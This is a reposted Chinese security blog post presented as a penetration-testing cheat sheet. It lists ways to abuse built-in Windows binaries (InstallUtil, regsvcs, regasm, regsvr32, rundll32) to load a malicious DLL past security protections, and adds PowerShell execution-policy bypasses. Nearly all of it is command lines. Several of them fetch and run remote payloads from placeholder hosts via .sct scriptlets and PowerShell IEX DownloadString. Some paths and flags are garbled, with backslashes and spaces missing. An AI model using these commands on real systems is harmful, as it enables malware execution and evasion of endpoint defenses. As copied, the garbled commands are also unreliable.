加载 DLL 的多种方式

admin 2023年6月13日15:07:51评论31 views字数 2189阅读7分17秒阅读模式

####################
免责声明:工具本身并无好坏,希望大家以遵守《网络安全法》相关法律为前提来使用该工具,支持研究学习,切勿用于非法犯罪活动,对于恶意使用该工具造成的损失,和本人及开发者无关。
####################

在渗透测试过程中,意图使目标主机执行恶意 DLL ,达到一定的目的。但在这个过程中总是会遇到各种各种的安全防护,下面通过系统自带的程序来绕过安全防护,加载我们自己想要执行的 DLL 文件:

Copy
#InstallUtil.exe
#x86
C:WindowsMicrosoft.NETFrameworkv4.0.30319InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
#x64
C:WindowsMicrosoft.NETFramework64v4.0.3031964InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll

#regsvcs.exe
#x86
C:WindowsMicrosoft.NETFrameworkv4.0.30319regsvcs.exe AllTheThings.dll
#x64
C:WindowsMicrosoft.NETFramework64v4.0.30319regsvcs.exe AllTheThings.dll

#regasm.exe
#x86
C:WindowsMicrosoft.NETFrameworkv4.0.30319regasm.exe /U AllTheThings.dll
#x64
C:WindowsMicrosoft.NETFramework64v4.0.30319regasm.exe /U AllTheThings.dll

#regsvr32
#x86
regsvr32 /s /u AllTheThings.dll
#x64
regsvr32 /s AllTheThings.dll

#加载远程脚本执行
regsvr32 /s /u /i:http://ip.xyz/file.sct scrobj.dll
regsvr32 /u /n /s /i:\192.168.164.1folderpayload.sct scrobj.dll

#rundll32
rundll32 AllTheThings.dll,EntryPoint
rundll32 javascript:"..mshtml,RunHTMLApplication";o=GetObject("script:http://ip/payload.sct");window.close();
rundll32.exe javascript:"..mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"
rundll32.exe javascript:"..mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject("WScript.Shell");w.run("calc");window.close()");
rundll32.exe javascript:"..mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}

顺便再补充一下绕过 PowerShell 执行策略的命令:

Copy
#本地文件执行
powershell.exe -ExecutionPolicy bypass -File Payload.ps1
powershell.exe exec bypass -Command "& {Import-Module C:Payload.ps1;Invoke-AllChecks}"

#远程无文件执行
powershell.exe -ExecutionPolicy Bypass-WindowStyle Hidden-NoProfile-NonIIEX(New-ObjectNet.WebClient).DownloadString("http://192.168.1.1/Payload.ps1");[payload的参数] (去除方括号)

#如果本地的 powershell 命令参数进行了限制,还可以尝试使用 ps_encoder.py 脚本将编码转为 base64 格式
Copy
forfiles /p %COMSPEC:~0,19% /s /c "@file -noe" /m po*l.*e

加载 DLL 的多种方式



原文始发于微信公众号(菜鸟小新):加载 DLL 的多种方式

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年6月13日15:07:51
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   加载 DLL 的多种方式http://cn-sec.com/archives/1803001.html

发表评论

匿名网友 填写信息